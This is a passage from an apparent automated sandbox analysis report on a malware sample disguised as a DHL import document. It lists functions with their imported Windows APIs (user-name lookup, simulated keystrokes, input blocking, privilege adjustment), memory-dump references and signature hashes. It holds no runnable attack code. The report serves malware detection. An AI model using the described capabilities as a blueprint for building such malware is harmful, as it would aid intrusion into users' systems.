                                                                                          • Instruction Fuzzy Hash: E9E0B631100548ABDF11AF64DE09A6A3F69FB85791B114014FE558A322DB79DD42DA80
                                                                                          Function 0082D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0082D28C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID: X64
                                                                                          • API String ID: 2645101109-893830106
                                                                                          • Opcode ID: 60e8b11bf0617975f8b534403c2b780f677082b42f0ed63adb5b4b7ce188d013
                                                                                          • Instruction ID: bc59e63bd6f2f6bdbd15a15d3223865393319cf33336839430f420ae0db1ceb9
                                                                                          • Opcode Fuzzy Hash: 60e8b11bf0617975f8b534403c2b780f677082b42f0ed63adb5b4b7ce188d013
                                                                                          • Instruction Fuzzy Hash: C0D0C9B480112DEACB90CB90EC88DD9B77CFB14305F100151F106E2000D77495488F20
                                                                                          Function 007FCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                          • Instruction ID: 83b4e6c9ca5284a7ce3d4aaf3abdfc871eaeaa6075712e52c469b85c2348a0b8
                                                                                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                          • Instruction Fuzzy Hash: 6A021B72E0021D9BDF15CFA9C9806ADFBF5EF48314F258169D919E7380D735AA41CB90
                                                                                          Function 008468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00846918
                                                                                          • FindClose.KERNEL32(00000000), ref: 00846961
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          • Opcode ID: 3c94ab56d564665a1c0b8c480002deda4b33bc8660c2ff68d7d878f57418ce2e
                                                                                          • Instruction ID: 8c31b19385ba77e1fc637f713b216e7bbf34d6535f193fd658c110087a890b5d
                                                                                          • Opcode Fuzzy Hash: 3c94ab56d564665a1c0b8c480002deda4b33bc8660c2ff68d7d878f57418ce2e
                                                                                          • Instruction Fuzzy Hash: AD1190316142059FC710DF29D488A26BBE5FF85328F15C69AE8698F3A2D774EC05CB91
                                                                                          Function 008437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437E4
                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFormatLastMessage
                                                                                          • String ID:
                                                                                          • API String ID: 3479602957-0
                                                                                          • Opcode ID: 49269105fe602796236317adce9de5f4105b2c2c9934eb6aec8a973556027622
                                                                                          • Instruction ID: 7a3ceae9f647ec94a2af183adf4beb06da045be0c061744ad967159cdd73bdab
                                                                                          • Opcode Fuzzy Hash: 49269105fe602796236317adce9de5f4105b2c2c9934eb6aec8a973556027622
                                                                                          • Instruction Fuzzy Hash: 13F0E5B06052286AEB2017768C4DFEB3AAEFFC4765F000175F609D2381D9A09944C6B0
                                                                                          Function 0083B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0083B25D
                                                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0083B270
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: InputSendkeybd_event
                                                                                          • String ID:
                                                                                          • API String ID: 3536248340-0
                                                                                          • Opcode ID: 077eeba6b746a2e09d226266fc345d412216440383514138552811ec80cc3682
                                                                                          • Instruction ID: e5f5de33106e2c14c86d65d9d4acd04c0386cd3134d59fd4113a698ff3a652a6
                                                                                          • Opcode Fuzzy Hash: 077eeba6b746a2e09d226266fc345d412216440383514138552811ec80cc3682
                                                                                          • Instruction Fuzzy Hash: EEF01D7180428DABDB059FA5C806BBE7BB4FF04309F00910AF965A6192C7B986119F94
                                                                                          Function 008310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
                                                                                          • CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          • Opcode ID: 44b965e9d51673e071389436954de63f15847308f4e6c67527d5969c081ccb70
                                                                                          • Instruction ID: 3723526dc2457bac53327ef882c8903e9a6669d36a3955773ef12848303a072f
                                                                                          • Opcode Fuzzy Hash: 44b965e9d51673e071389436954de63f15847308f4e6c67527d5969c081ccb70
                                                                                          • Instruction Fuzzy Hash: 17E04F32008A40EEE7252B12FC09E777BA9FB04310F10882DF4A5804B1DBA26C90DB50
                                                                                          Function 007DCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Variable is not of type 'Object'., xrefs: 00820C40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Variable is not of type 'Object'.
                                                                                          • API String ID: 0-1840281001
                                                                                          • Opcode ID: 66027bfa65427d2a0d3f1085939bde03b4cbc6d066b17e2ee33885b535212c1c
                                                                                          • Instruction ID: 346c4c7627eaa668118f1021e46ef999e769af1139091658fefa11c13f56de19
                                                                                          • Opcode Fuzzy Hash: 66027bfa65427d2a0d3f1085939bde03b4cbc6d066b17e2ee33885b535212c1c
                                                                                          • Instruction Fuzzy Hash: D832AC74900229DBCF15DF94D985AEDB7B5FF05304F24405AE806AB392CB79AE85CF60
                                                                                          Function 0080676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00806766,?,?,00000008,?,?,0080FEFE,00000000), ref: 00806998
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: c70616610653456740802fdc9b7857ec40c6040c7653e044cfea638ad4350836
                                                                                          • Instruction ID: e87f0aaa439b0d12b62f374301cd7b70bcc7f75409378d298b5d8fa414921166
                                                                                          • Opcode Fuzzy Hash: c70616610653456740802fdc9b7857ec40c6040c7653e044cfea638ad4350836
                                                                                          • Instruction Fuzzy Hash: 27B13B316106099FD755CF28C88AB657BE0FF45368F29C658E899CF2E2D335E9A1CB40
                                                                                          Function 007EB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 82e57052542eadd7fe5adb1bae70d644f91411bbf06b4dfde7e797f4ea329315
                                                                                          • Instruction ID: 14cae6deb2dc8f68ea6036cc8619ea70a54fd6e81502a34f6aacd3fcdb3e283c
                                                                                          • Opcode Fuzzy Hash: 82e57052542eadd7fe5adb1bae70d644f91411bbf06b4dfde7e797f4ea329315
                                                                                          • Instruction Fuzzy Hash: 29126E71901269DBCF24CF59D8816EEBBF5FF48710F14819AE809EB255EB349A81CF90
                                                                                          Function 0084EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BlockInput.USER32(00000001), ref: 0084EABD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          • Opcode ID: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
                                                                                          • Instruction ID: 9b2879cdb45a16cd0ca813b629fa0479ee30a809932c4a420e6ea44c022fa384
                                                                                          • Opcode Fuzzy Hash: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
                                                                                          • Instruction Fuzzy Hash: C0E012312002159FC710DF59D404D9AB7E9FF68760F018416FD45C7351D674A8408B90
                                                                                          Function 007F09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007F03EE), ref: 007F09DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
                                                                                          • Instruction ID: c8e7264fe397d75236044329f21401e49a225a62a07a965625f43262a32f7b1b
                                                                                          • Opcode Fuzzy Hash: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 007F781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                          • Instruction ID: 122144c297cb885f0e1e231926b7ef8ba5ccda8bf41e41a4a5bf2c2f5b9a2280
                                                                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                          • Instruction Fuzzy Hash: 4C51797160C70D9BDB3C8A6C889E7BE67D99B12380F184509DB82DB382C65DEE42D352
                                                                                          Function 00806DD9 Relevance: .6, Instructions: 637COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c77dcd0aee6d30ef000f0c2b05d089f6bbe2bccc2f4015dded1dfd7646a1331
                                                                                          • Instruction ID: 7e735532dd6a9a9620477141ba706c97cc0ec39d65d84f0a56783ca79cbac4cc
                                                                                          • Opcode Fuzzy Hash: 4c77dcd0aee6d30ef000f0c2b05d089f6bbe2bccc2f4015dded1dfd7646a1331
                                                                                          • Instruction Fuzzy Hash: 84320022D29F014DD7639634CC26325A649FFB73C5F15D737E82AB5AAAEB29D4C34100
                                                                                          Function 007ECC39 Relevance: .6, Instructions: 635COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff95460d200379b997138f195a66718bd21c3f5aad7260acb0aeb3a012db5600
                                                                                          • Instruction ID: c73742dbbe2416926d0311453baa5b49bb1958763a20496a31db550798b2578d
                                                                                          • Opcode Fuzzy Hash: ff95460d200379b997138f195a66718bd21c3f5aad7260acb0aeb3a012db5600
                                                                                          • Instruction Fuzzy Hash: DA322775A001B98BCF25CF29E490A7D7BA1FB49314F38816AE44ADB2A1D334DDC2DB51
                                                                                          Function 007D7920 Relevance: .6, Instructions: 563COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f92afb3615c6a87fd0b7e8062d61bfa779650b0643f391a0276e5a03a58c8471
                                                                                          • Instruction ID: 9f6914850b26696d2134dd828959ff868aefe43f283a71b20f4348b491a7f1fe
                                                                                          • Opcode Fuzzy Hash: f92afb3615c6a87fd0b7e8062d61bfa779650b0643f391a0276e5a03a58c8471
                                                                                          • Instruction Fuzzy Hash: 6B229FB0A00609DFDF14DF64D885AEEB7B6FF84304F14462AE816E7391E73AA951CB50
                                                                                          Function 007D91C0 Relevance: .5, Instructions: 475COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38527200e04bedb39e5a5b9f877a4e7454f95913e4c1b05d5b2b106cb551858a
                                                                                          • Instruction ID: b62f0879ebc75abe23ed3c83dd2402006b64bb0ab40409b27b16718017de03d9
                                                                                          • Opcode Fuzzy Hash: 38527200e04bedb39e5a5b9f877a4e7454f95913e4c1b05d5b2b106cb551858a
                                                                                          • Instruction Fuzzy Hash: 5C02C5B1E0020AEBDB04DF64D885AAEB7B5FF54304F148169E906DB391EB35AE50CBD1
                                                                                          Function 00809EEE Relevance: .3, Instructions: 294COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ded09401fdc5f6c62a1345836ae1bc80e349efa4564bf31e68dc066acb71aab7
                                                                                          • Instruction ID: 5d6931856cc51f34ad5353135621641796cced849ae7a0990e3e7509c68ed293
                                                                                          • Opcode Fuzzy Hash: ded09401fdc5f6c62a1345836ae1bc80e349efa4564bf31e68dc066acb71aab7
                                                                                          • Instruction Fuzzy Hash: CCB1F020D2AF414DC22396399835336B64CBFBB2C5F91D31BFC1A74E66EB2286C35142
                                                                                          Function 007F1C77 Relevance: .3, Instructions: 254COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
